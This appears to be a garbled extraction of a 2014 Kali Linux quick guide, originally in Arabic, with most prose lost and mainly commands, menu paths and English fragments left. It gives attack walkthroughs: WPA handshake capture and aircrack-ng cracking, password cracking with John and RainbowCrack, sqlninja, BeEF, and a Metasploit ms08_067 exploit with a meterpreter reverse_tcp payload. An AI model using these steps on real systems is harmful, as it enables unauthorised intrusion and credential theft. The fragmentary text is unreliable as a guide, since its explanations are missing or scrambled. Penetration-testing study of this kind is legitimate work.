KALI LINUX
2014
kali linux
kali linux
kali
kali linux
Kali Linux VMware
kali
DNSmap
live hosts
SSL
kali
webScarab proxy
sqlninja
Websploit framework
John the Ripper
RainbowCrack
Kismet
Fern WIFI Cracker
Bluetooth auditing
Exploitation
Browser Exploitation Framework
Social Engineer Toolkit
Autopsy Forensic Browser
The Sleuth Kit
5
Nmap
Aircrack
Burp Suite
Burp proxy
Burp Spider
Burp Intruder
Metasploit Exploitation Framework
Kali Linux Network forensics
wireshark
Rootkit-scanning forensics with chkrootkit
md5deep
Official sites
Articles and tutorials
Community
Blogs
Twitter
Kali Linux
kali
.linux kali
....
:
Kali Linux kali Linux
Kali Linux
.
.Kali
.Kali Linux
5
.Kali Kali
:
.Nmap
.Aircrack
.Burp Suite
.Metasploit Exploitation Framework
SQL injection .sqlmap
digital forensics .Kali Linux
Twitter .
Kali Linux
,Kali Linux .
Kali Linux . Kali
Linux
.
:
033 .
.PCI
.C, Python, Ruby
.
:
ISO
Vmware images
ARM images
Kali .
.
:
Kali :
.12 GB
1 GB RAM .
.
ISO .http://www.kali.org/download
. :
.Live boot
.Kali
.Kali
.Apply All Operations Gparted
.Kali
.Graphical install
...
. Kali .toor
.
.Gparted
Kali Linux .dual boot
Kali
Kali .
Vmware Image http://www.kali.org/download
.
Kali Linux Virtual Box ISO
.virtual box
.
. . Kali
ISO .
.
.VirtualBox guest addition
:
.1 :
cp /media/cd-rom/VboxLinuxAdditions.run /root/
.2 :
chmod 755 /root/VboxLinuxAdditions.run
.0 :
./VboxLinuxAdditions.run
Kali Linux
OS .patches
. terminal
:
apt-get update
Kali Linux
.
Kali Linux
. .Kali
Kali .Ubuntu Linux
:
:/etc/ .
:/opt/ metasploit .
:/sys/ .
:/root/ .
:/lib/ .
. .
.Application | Kali linux
Kali Linux
Kali Linux
Trace ,DNSmap ,)the network port mapper( Nmap .
.
DNSmap
Domain Name System
domain . www.Kali.org
HTTP .Kali
DNSmap subdomains domain.
terminal DNS
:www.rediff.com
root@kali:~#dnsmap rediff.com
.
Nmap .
.
:
root@kali:~#nmap -h
UDP :
root@kali:~#nmap -sU 192.168.5.0-255
live hosts
Fping host .
root@kali:~#fping google.com
google.com is live
SSL
SSLScan SSL SSL
.SSL
Dsniff .
. unlsnarf, WebSpy,
mailsnarf.
Netsniff .Linux
Netsniff-ng .
.mmap .pcap
online .offline
OpenVAS
.
OpenVAS
Application|Kali Linux|Vulnerability Analysis|OpenVAS
:
openvas-setup
.OpenVAS :terminal
root@kali:~#openvas-adduser
.ctrl + d
:
root@kali:~#openvas-nvt-sync
.
.Application|Kali Linux|Vulnerability Analysis|OpenVAS|openvas-gsd
.
.172.0.0.1
. .Task|New
:
. .
kali
Kali
.
WebScarab proxy
WebScarab HTTP HTTPS
. .
WebScarab XSS/CSRF
. WebScarab
:
.1 WebScarab Application|Kali Linux|Web
.applications|Web application proxies|Webscarab
.2 . proxy
120232321 .8338
.0 .WebScarab
Proxy . GET POST
sqlninja
Sqlninja SQL injection
.Microsoft SQL
. sqlninja
.
sql ninja
.Applications|Kali Linux|Web applications|Database Exploitation|sqlninja
terminal .sqlninja
mode .m
m .
:
root@kali:~#sqlninja -m test
sqlninja rel. 0.2.3-r1
Copyright (c) 2006-2008 icesurfer
[-] sqlninja.conf does not exist. You want to create it now ? [y/n]
( .)sqlninja.conf
. .
The Websploit framework
Websploit
. Metasploit .
: terminal
wsf>update
[*]Updating websploit framework, please wait...
:
wsf>show modules
www.target.com
:
wsf>use web/dir_scanner
wsf:Dir_scanner>show options
wsf:Dir_scanner>set TARGET www.target.com
wsf:Dir_scanner>run
Websploit .
Kali .
online .offline
Kali .
John the Ripper
John the Ripper
Unix Hash Windows DES
kerberos .
John the Ripper Brute Force
.
Brute Force
.
John the Ripper :
.Applications|Kali Linux|Password Attacks|Offline Attack|John
Brute Force :
root@kali:~#john pwd
pwd .
:
root@kali:~#john --show pwd
:
root@kali:~#john --wordlist=password.lst --rules pwd
RainbowCrack
RainbowCrack .John
rainbow Hashes
. RainbowCrack hash
rainbow .
.Brute Force
RainbowCrack :
.Applications|Kali Linux|Password Attacks|Offline Attacks|RainbowCrack
:
rcrack *.rt -l hash.txt
:
.Applications|Kali Linux|Wireless Attacks|Wireless tools|Kismet
( )wlan0 Add
:
Kismet
. .
Kismet
.
Fern WIFI Cracker
Wi-Fi
. WEP/WPA/WPS
.Python
Kali .Reaver Python Scrapy Aircrack
: .
WEP Cracking with Fragmentation, Chop-Chop, Caffe-Latte, Hirte,
ARP Request Replay, or WPS attack.
WPA/WPA2 Cracking with dictionary or WPS-based attacks.
Automatic saving of the key in the database upon a successful crack.
Automatic access point attack system.
Session hijacking (passive and Ethernet modes).
Access point MAC address for geolocation tracking.
: Fern
.Applications|Kali Linux|Wireless Attacks|Wireless tools|Fern WIFI Cracker
.drop-down
Wi-Fi
(.)WPA, WEP, ...
OK .
.
Bluetooth auditing
Kali .bluetooth Bluetooth
.Bluetooth auditing Bluetooth .
.BlueRanger
BlueRanger
BlueRanger .Bluetooth
pings Bluetooth
ping .
:BlueRanger
Applications|Kali Linux|Wireless Attacks|Bluetooth tools|BlueRanger.
Bluetooth SYNOPSIS
:
root@kali:~#blueranger.sh hci0 6C:D4:8A:B0:20:AC
.
beef beef .
Kali BeEF .
:
root@kali:/#apt-get update
root@kali:/#apt-get install beef-xss
:
root@kali:/#cd /usr/share/beef-xss
root@kali:/#./beef
demo
.
BeEF .
:
:Getting Started .
:Logs .
:Current Browser .
. 6 .
:
:Details o .
:Logs o log .
:Commands o
.
:Rider o HTTP .
:XssRays o XSS .
.BeEF BeEF
demo .framework
. .1
. Spear-Phishing
Attack Vector .Create Social Engineering Template
.SET
SET .
SET .
Metasploit framework payload meterpreter connections
shells .
Forensics
Kali forensics
Forensics .
. Forensics
.
.Kali
Autopsy :
Applications|Kali Linux|Forensics|Digital Forensics|Autopsy.
:
localhost:9999/autopsy
/ .New Case
:
5
Kali Linux
Nmap
.
Nmap .
. console .nmap
.Nmap .
IP :
root@kali:~#nmap 192.168.56.1
IP :
root@kali:~#nmap 192.168.56.1-255
port :
root@kali:~#nmap 192.168.56.1 -p 80
ports :
root@kali:~#nmap 192.168.56.0/24 -p 1-1000
host :
nmap 192.168.56.0/24 --exclude 192.168.1.5
nmap 192.168.56.0/24 --exclude 192.168.1.5,192.168.1.254
:
nmap -F 192.168.56.1
:
nmap -A 192.168.56.1
nmap -v -A 192.168.56.1
:IP
nmap -sA 192.168.1.254
Nmap
:
nmap -PN 192.168.1.1
:
nmap --packet-trace 192.168.1.1
:
nmap -sV 192.168.56.1
TCP SYN :
nmap -sS 192.168.56.1
TCP TCP
:
nmap -sT 192.168.56.1
UDP :
nmap -sU 192.168.56.1
:
nmap -sU 192.168.56.1 > scan.txt
Nmap .
.
Aircrack
.Kali Fern WIFI cracker
.
.
. google .
.USB
:Wi-Fi
.1 .
.iwconfig
.wlan0
:
root@kali:~#ifconfig wlan0 up
.2 .
:
root@kali:~#iwlist wlan0 scan
.
.0 .monitoring mode
.monitoring mode
.
.airmon-ng
.monitoring mode :
root@kali:~#airmon-ng start wlan0
monitoring mode .
. ifconfig mon0
.monitoring
.4 .
.
airodump-ng . :
airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0
.
.132333
.5 .
.root )crack-01.cap( *.cap
. aircrack-ng
. dark0de.lst
. http://www.filecrop.com/dark0de.lst.html
:
root@kali:~#aircrack-ng crack-01.cap -w dark0de.lst
.aircrack-ng
Burp Suite
Burp suite .
Kali .
. :
Applications|Kali Linux|Web Applications|Web Application Fuzzers|Burp
Suite.
Burp Suite :
Proxy .
Burp Suite .
.Burp Suite
Burp proxy
proxy .
.man-in-the-middle
.proxy proxy localhost
.8333
Burp Intruder
Burp Intruder 4 .Target, Positions, Payloads, Options :
target . .102232321
Positions .
.
.Sniper attack, battering ram attack, pitchfork attack, cluster bomb
Payloads
. SQL injection positions
payload .injection string
Options
.
.Burp Suite
.
functionalities that are required during penetration testing. Some of its base
functions include logging, configuring, database storage, meterpreter
scripting, and so on.
Auxiliary modules: This is one of the major features of Metasploit. Auxiliary
modules are specific function modules that can perform a variety of tasks
both pre and post exploitation. Some of its chief functionalities include
scanning, information gathering, launching specific attacks, OS detection,
service detection, and so on.
Packaged tools: Metasploit comes with several handy tools that can further
enhance the penetration testing experience. These add-on packages can
create standalone payloads and encrypt the payloads using different
algorithms, database connectivity, the GUI interface, and so on.
Third-party plugins: Metasploit can integrate with several third-party
plugins and use its results to build its own attack structure. Results from
various tools, such as Nmap, Nessus, and NeXpose, can be used directly within
the framework.
Open source: The free version of Metasploit is open source, so it can be fully
extended and modified as needed.
: Metasploit
Applications|Kali Linux|Top 10 security tools|Metasploit Framework
Metasploit msf> console
.
. Metasploit
. Nmap
msf > nmap 192.168.56.1/24
:
Nmap 4 . Windows XP
Nmap .192.168.56.102
Windows XP remote exploit .XP
. netapi
.Metasploit
msf > search netapi
.PAYLOAD:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
meterpreter .
show options . LHOST IP IP
.
. exploit .
console meterpreter
payload .
Metasploit
Metasploit .exploit .
.Metasploit
.kali Linux
Wireshark Kali :
Applications|Kali Linux|Top 10 security tools|Wireshark
.
. Start .
.
Capture panel .
Packet details panel .
Packet bytes panel .capture panel packet details
. . options
.
Rootkit-scanning forensics with chkrootkit
Rootkit
Kali . rootkit .chkrootkit :
Applications|Kali Linux|Forensics|Digital anti-forensics|chkrootkit
chkrootkit Chkrootkit .
.
md5deep
md5deep hash message digests
. signature
. MD5 signature
. MD5 MD5
.
md5deep . :
Applications|Kali Linux|Forensics|Forensics Hashing Tools|md5deep
signatures :
root@kali:~#md5deep -r /darklord > darklordmd5.sum
:
root@kali:~#md5deep -rx darklordmd5.sum
Kali Linux
.
Official sites
:
Homepage: http://www.kali.org
Manual and documentation: http://docs.kali.org
Blog: http://www.kali.org/blog/
Source code: http://git.kali.org/gitweb/
Articles and tutorials
:Kali
Backtrack is reborn-kali:
www.offensive-security.com/offsec/backtrack-rebornkali-linux/
Easily Accessing Wireless network with Kali Linux:
https://community.rapid7.com/community/infosec/blog/2013/05/22/easily-assessing-wireless-network-withkali-linux
Kali Linux cracks passwords on an enterprise level:
http://lifehacker.com/5990375/kali-linux-crackspasswords-on-the-enterprise-level
Installing Vmware tools on Kali Linux:
http://www.drchaos.com/installing-vmware-tools-onkali-linux/
Community
: Kali Linux community
Blogs
:
Learning security tips:
http://www.securitytube.net
Metasploit Unleashed, a project by the founder of Kali:
http://www.offensive-security.com/metasploitunleashed/Main_Page
Video tutorials on Kali:
http://cyberarms.wordpress.com/2013/07/01/videotraining-kali-linux-assuring-security-by-penetrationtesting/
Cyber Attack management with Armitage:
http://www.fastandeasyhacking.com/
Twitter
:
Kali Linux on Twitter: https://twitter.com/kalilinux
MalwareMustDie, NPO on Twitter:
https://twitter.com/malwaremustdie
Kali Linux
INSTANT KALI
LINUX
QUICK GUIDE
2014